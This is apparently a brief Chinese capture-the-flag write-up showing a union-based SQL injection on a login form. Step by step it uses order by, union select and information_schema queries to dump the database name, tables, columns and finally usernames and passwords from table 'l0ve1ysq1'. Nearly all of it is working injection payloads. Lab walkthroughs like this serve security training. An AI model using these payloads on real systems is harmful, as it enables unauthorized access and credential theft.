首先我们随意输入用户名,密码,判断此为get方式传参
 
紧接着闭合密码便可以很容易地得出此为一个get基于报错的注入
 
当然碰到登陆页面我们首先想到的便是万能密码,也可以知道此为sql注入
开始注入,get基于报错的常规流程
- order by判断字段数
1' order by 4# 
1' order by 3# 
说明有三个字段
- 紧接着判断回显点
1' union select 1,2,3 # 
很明显2,3都为注入点
-
爆库 1' union select 1,database(),3 #  -
爆表 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#  -
爆字段名 1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#  -
得出信息 1' union select 1,group_concat(id,username,password),3 from l0ve1ysq1 #  
|